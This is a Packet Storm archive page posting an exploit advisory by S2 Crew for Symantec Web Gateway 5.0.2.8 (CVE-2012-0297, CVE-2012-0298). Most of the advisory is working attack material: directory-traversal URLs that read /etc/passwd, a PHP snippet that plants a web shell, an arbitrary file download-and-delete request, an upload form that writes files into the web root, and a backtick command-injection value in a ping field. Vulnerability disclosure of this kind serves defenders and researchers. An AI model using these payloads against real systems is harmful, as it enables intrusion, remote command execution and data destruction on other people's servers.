exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Symantec Web Gateway 5.0.28 LFI / Code Execution

Symantec Web Gateway 5.0.28 LFI / Code Execution
Posted Jun 27, 2012
Authored by S2 Crew

Symantec Web Gateway version 5.0.2.8 suffers from local file inclusion, remote command execution, and arbitrary file deletion vulnerabilities.

tags | exploit, remote, web, arbitrary, local, vulnerability, file inclusion
advisories | CVE-2012-0297, CVE-2012-0298
SHA-256 | a0fccf32d3c50c44bbaec6e8b29d6a94e5b750a7a3630cb98f887b64cf02a1a9

Symantec Web Gateway 5.0.28 LFI / Code Execution

Change Mirror Download
Software: Symantec Web Gateway
Current Software Version: 5.0.2.8
Product homepage: www.symantec.com
Author: S2 Crew [Hungary]
CVE: CVE-2012-0297, CVE-2012-0298, ???

File include:
https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd

File include and OS command execution:
http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd
You can execute OS commands just include the error_log:
/usr/local/apache2/logs/
-rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log
-rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log

Make a connection to port 80:
<?php
$f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');
$cmd = "<?php system(\$_GET['cmd']); ?>";
fputs($f,$cmd);
fclose($f);
print "Shell creation done<br>";
?>

Arbitary file download and delete:
https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog
d parameter: the complete filename
After the download process application removes the original file with root access! :)

Command execution methods:
1.Method
Download and delete the /var/www/html/ciu/.htaccess file.
After it you can access the ciu interface on web.
There is an upload script: /ciu/uploadFile.php
User can control the filename and the upload location:
$_FILES['uploadFile'];
$_POST['uploadLocation'];

2.Method
<form action="https://192.168.82.192/ciu/remoteRepairs.php" method="POST" enctype="multipart/form-data">
<input type="file" name="uploadFile">
<input type="text" name="action" value="upload">
<input type="text" name="uploadLocation" value="/var/www/html/spywall/cleaner/">
<input type="hidden" name="configuration" value="test">
<input type="submit" value="upload!">
</form>

The "/var/www/html/spywall/cleaner" is writeable by www-data.

Command execution after authentication:

http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)

From the modified POST message:
Content-Disposition: form-data; name="pingaddress"
127.0.0.1`whoami>/tmp/1234.txt`

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close